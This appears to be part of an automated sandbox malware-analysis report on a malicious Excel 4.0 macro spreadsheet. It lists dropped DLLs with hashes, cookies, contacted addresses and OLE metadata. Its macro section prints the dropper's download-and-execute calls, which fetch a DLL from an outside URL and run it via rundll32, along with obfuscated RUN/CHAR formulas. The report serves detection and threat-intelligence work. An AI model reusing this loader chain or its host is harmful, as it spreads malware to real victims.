                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\ProgramData\formnet.dllcase (4374).xlsGet hashmaliciousBrowse
                                    case (166).xlsGet hashmaliciousBrowse
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllcase (4374).xlsGet hashmaliciousBrowse
                                        case (166).xlsGet hashmaliciousBrowse
                                          C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dllcase (4374).xlsGet hashmaliciousBrowse
                                            case (166).xlsGet hashmaliciousBrowse

                                              Created / dropped Files

                                              C:\ProgramData\formnet.dll
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):933888
                                              Entropy (8bit):6.687983171155114
                                              Encrypted:false
                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                              Malicious:true
                                              Joe Sandbox View:
                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                              • Filename: case (166).xls, Detection: malicious, Browse
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:downloaded
                                              Size (bytes):933888
                                              Entropy (8bit):6.687983171155114
                                              Encrypted:false
                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                              Malicious:true
                                              Joe Sandbox View:
                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                              • Filename: case (166).xls, Detection: malicious, Browse
                                              Reputation:low
                                              IE Cache URL:https://rnollg.com/kev/scfrd.dll
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\B6EE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59780
                                              Entropy (8bit):7.769957533986089
                                              Encrypted:false
                                              SSDEEP:768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQpy:SwmW+aB3viH/WaI5xGVpoWpgKy
                                              MD5:72B1D491C5D55BF3759E1A84327B4DD1
                                              SHA1:158E7FAF1AD8630F40BE4CA0EE03AFBBFBDA7587
                                              SHA-256:8B7D4691F96CC39136EA47E1671C1FAC909624B6DA6ED446DC8AADFD43CF2241
                                              SHA-512:647345458376C066E95CD91EAB957760C97D03387FC33A4D7F07705A556908CA2FF5D3F9F7D63331BC8E9C2D43DE5302F2422931AFE0B3738D9BF0EE0E0B41CD
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...*E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a.*.BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:31:44 2021, atime=Wed Jan 27 04:31:44 2021, length=12288, window=hide
                                              Category:dropped
                                              Size (bytes):867
                                              Entropy (8bit):4.485214050927514
                                              Encrypted:false
                                              SSDEEP:12:85Qlm0LgXg/XAlCPCHaXtB8XzB/POfUonX+WnicvbulbDtZ3YilMMEpxRljKQTdK:85Ri/XTd6jROfnYemDv3qRrNru/
                                              MD5:0F4A48D66050B828094DF3128D43FA34
                                              SHA1:E5EFE96BE8948B65B9CF903591E1ABBBB2E1BEBA
                                              SHA-256:18179E3A56673770272E6BD51EDD01BC37DDBD9F8BD1E5E487CC8AE5AEF4D09E
                                              SHA-512:F72296F6305C7F258898C9B93B222100C3AEA054DFAAC0A547763F1F48DB372D610B408A84E8C3868821CA40200A2100C318A9222BEE3375309B24FF6F0CE7BC
                                              Malicious:false
                                              Reputation:low
                                              Preview: L..................F...........7G..\5..m...\5..m....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;R.+..Desktop.d......QK.X;R.+*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\849224\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......849224..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (1522).LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Jan 27 04:31:44 2021, atime=Wed Jan 27 04:31:44 2021, length=99328, window=hide
                                              Category:dropped
                                              Size (bytes):4076
                                              Entropy (8bit):4.529756909715809
                                              Encrypted:false
                                              SSDEEP:96:8+k/XojFpNZsRQh2+k/XojFpNZsRQh2Rk/XojFpNZsRQh2Rk/XojFpNZsRQ/:8+ZjFUQE+ZjFUQERZjFUQERZjFUQ/
                                              MD5:E3A00E21A4C4A45FA2CFAEF5EF8E2903
                                              SHA1:CCE3D7DAEF300B6687B14FBDDB963532A25A40CB
                                              SHA-256:E6D56834373B2FDC3F5A7D7085E8CB028535661E9951F974949444DC4323DDD6
                                              SHA-512:7EF4CC7A0EC1ECCAACA31C3936D041E23BDCBBA61469FADD99FA4E13CEDE248ECB7E7DBF20BC21D7328E68D862CB33BA6200699F9EC966388E147C4E618DB6AD
                                              Malicious:false
                                              Reputation:low
                                              Preview: L..................F.... ...8P\..{..\5..m......m................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.)d..;R.+ .CASE(1~1.XLS..L.......Q.y.Q.y*...8.....................c.a.s.e. .(.1.5.2.2.)...x.l.s.......y...............-...8...[............?J......C:\Users\..#...................\\849224\Users.user\Desktop\case (1522).xls.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.1.5.2.2.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......849224..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):176
                                              Entropy (8bit):4.505329288435076
                                              Encrypted:false
                                              SSDEEP:3:oyBVomMl6p2eIp6p2mMl6p2eIp6p2mMl6p2eIp6p2mMl6p2v:dj6wpowpowpowI
                                              MD5:7898FCF9F881DC3E2A62A466CB43A44F
                                              SHA1:9066A7712F6E5254EC4EDE917CCA3908408EA955
                                              SHA-256:4E0942ABBC3DE559BF69A31D5656B1F8E9916AF6B2F8B65FF867F9E5E4AAE04E
                                              SHA-512:C6F159B721144699B046DFBA1E1A7F94B437032D81D179DCFA86502462F4318A857A6C3ECFA93DD912F5C8606B167F10A8BF37C3CB8C86570888A64D9B8B5821
                                              Malicious:false
                                              Reputation:low
                                              Preview: Desktop.LNK=0..[xls]..case (1522).LNK=0..case (1522).LNK=0..[xls]..case (1522).LNK=0..case (1522).LNK=0..[xls]..case (1522).LNK=0..case (1522).LNK=0..[xls]..case (1522).LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\B8J2SM51.txt
                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):115
                                              Entropy (8bit):4.444980817912232
                                              Encrypted:false
                                              SSDEEP:3:GmM/6cDpAOP6BhgvJMjMdl1cS0umOToSdT3gvX:XM/6c67BqvCjqlVZTLTg/
                                              MD5:F2F548DD24E9B0C38FF3FB517D7A4A0F
                                              SHA1:51450D25D76B8483F0732441CE04DB91603F61E5
                                              SHA-256:81194B069CFD8C50B1D1DAED8D4D0FE799BA0C3E838DBFDAD2170395F0636A2A
                                              SHA-512:3B171AB07647513E97E05EA2604EBB267D56B3DC22243CCBB2E1556422CD8A766133D3BC8BCF1BA06A9EBB41D3F63CA14B3404C72E324CA6E57E0918C84394BC
                                              Malicious:false
                                              Reputation:low
                                              IE Cache URL:govemedico.tk/
                                              Preview: __cfduid.d0989fb3cab30bfe1356f6a371d18fc201611693151.govemedico.tk/.9728.1462294912.30870453.2064030839.30864494.*.
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SCG1PMXY.txt
                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):117
                                              Entropy (8bit):4.521867418691274
                                              Encrypted:false
                                              SSDEEP:3:GmM/lOTgydWAEagvLKUUn7w2lSNEHgcAmORV3dRRgvX:XM/lqgyUARUUn7weEciRVN3g/
                                              MD5:AC01CE5971047E2EA6BF0DB937581A45
                                              SHA1:5CBE04A79971B6399FD7DA8B8E5B5BC2A42FFE41
                                              SHA-256:033252D17B1FDEFD54EEC153F1D29263C060C9D7E7EE75C5A24173282D83472C
                                              SHA-512:4369FE019E55AD7BEFA99F00B9A4D24E2F6F7F95423D5274B8762634985F6670CE290986201CDE22F3A1261D215A849A4645DF00E4932A6AA31EBC7FDF928D8E
                                              Malicious:false
                                              Reputation:low
                                              IE Cache URL:gadgetswolf.com/
                                              Preview: __cfduid.d91f7caba7cf7dfd33ba1fbed0316feb51611693149.gadgetswolf.com/.9728.1442294912.30870453.2047650810.30864494.*.
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TK4XJNTQ.txt
                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):119
                                              Entropy (8bit):4.448295634757574
                                              Encrypted:false
                                              SSDEEP:3:GmM/nYHDME6tU5TckvlAWqKJpKfcSNFA9mOQn6ShgvX:XM/nqPsPezqv0yApZUg/
                                              MD5:356F0AD06985ABA9C6183A4FA8A76EE7
                                              SHA1:1DDA2CDB4CED86480B074982353DDE2B890DCB83
                                              SHA-256:95ABA050D9A08499E7BE4ED70ED0A0172F0B5CB435168B3EFD08A9E88D81274D
                                              SHA-512:133B88BD0B5D85C1402E669C24DB474E07A7B674D18E98F95FD8A4DC387EE1126465214F81C422F3C09ED2CABF7893E8D844CF7BFBD767726D357A003CDD3075
                                              Malicious:false
                                              Reputation:low
                                              IE Cache URL:homesoapmolds.com/
                                              Preview: __cfduid.d3b015e68d25b82519975bf2921a745991611693150.homesoapmolds.com/.9728.1452294912.30870453.2057166827.30864494.*.
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WG4KTJBM.txt
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):112
                                              Entropy (8bit):4.414611423484315
                                              Encrypted:false
                                              SSDEEP:3:GmM/5BTu5N9PZGT0cSNKgl/mXVa6dTnvPv:XM/5BSPS5qMVa2TvPv
                                              MD5:FA4B1CD73EB3C02D11897B6C953D8216
                                              SHA1:6E2DFBB02BAF63D3AFCE6ECB2E652EE7E428E139
                                              SHA-256:7A2C0B3D4CB04A1E9B5566AE386AD2549C688BA04575681414E82A431D081F78
                                              SHA-512:85D68192D62DB243F63830215ABB21C9398AFC21DAD64F19D231FB9308AB14C5E101DE3F9EE5581BEE6787FC1DB6D350394290439741147517FBC674115F1A00
                                              Malicious:false
                                              Reputation:low
                                              IE Cache URL:rnollg.com/
                                              Preview: __cfduid.d459a91afca8f7f63a1f2b16f1e70adbe1611693116.rnollg.com/.9728.1112294912.30870453.3010501514.30864493.*.
                                              C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dll
                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):933888
                                              Entropy (8bit):6.687983171155114
                                              Encrypted:false
                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                              Malicious:false
                                              Joe Sandbox View:
                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                              • Filename: case (166).xls, Detection: malicious, Browse
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\77EE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Category:dropped
                                              Size (bytes):173366
                                              Entropy (8bit):5.331212309889464
                                              Encrypted:false
                                              SSDEEP:3072:9xrtdAOtyoVlDGUUlEfblBiPP58LmlPi+aEvthl7aEv9rO6DxrtdAOtyoVlDGUUI:9xrtdAOtyoVlDGUUlEfblBeP52mlPi+r
                                              MD5:FC1ACCEE4EEA7DD95F645AD5268CC441
                                              SHA1:0200CD09465A6D678E181B7ABA98C9DB3432F754
                                              SHA-256:E1189A21C66B92E214199A29A3757DEA8359D5C3C22F109C285C23EC25678BCB
                                              SHA-512:C27C160AA615AC953622FEFCC78FE34DA347964999AF2EE4501D92A7CFF4C7C978E51D2BF05C0243AD3E48B06BD31392EFC821AE4876D81F726DF14FCBDC2328
                                              Malicious:false
                                              Preview: ........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
                                              Entropy (8bit):3.8739671489784215
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 78.94%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                              File name:case (1522).xls
                                              File size:156713
                                              MD5:933ac69cb772d6e28636a81fc7665a26
                                              SHA1:7bb7870ebb261a2e0302600330abbc819d00acd3
                                              SHA256:d4592471179f7d3fbd94be05591c09c74b0d8b7dcca580504694c7514c1d9ef0
                                              SHA512:e4be1fa90192bb991468ce7edd1b951358de9287f26a1975a82ac60ded95ca9d337a0b89dc1deacc9ef836077c7345c4067de99bf82d15a406b6b3ce53ad8b52
                                              SSDEEP:3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g1E:49SUz4tH8vsderSh1yRNJdaAtH8U5B6P
                                              File Content Preview:........................>.......................0...........................-......./..........................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea286a4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "case (1522).xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:False

                                              Summary

                                              Code Page:1251
                                              Author:
                                              Last Saved By:
                                              Last Printed:2021-01-26 16:17:13
                                              Create Time:2020-04-23 12:26:24
                                              Last Saved Time:2021-01-26 16:28:15
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Document Code Page:1251
                                              Thumbnail Scaling Desired:False
                                              Company:
                                              Contains Dirty Links:False

                                              Streams

                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.843601759481
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.362148031008
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00
                                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752
                                              General
                                              Stream Path:Book
                                              File Type:Applesoft BASIC program data, first line number 8
                                              Stream Size:145752
                                              Entropy:3.94377585798
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
                                              Data Raw:09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                              Macro 4.0 Code

                                              CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
                                              CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)
                                              
                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,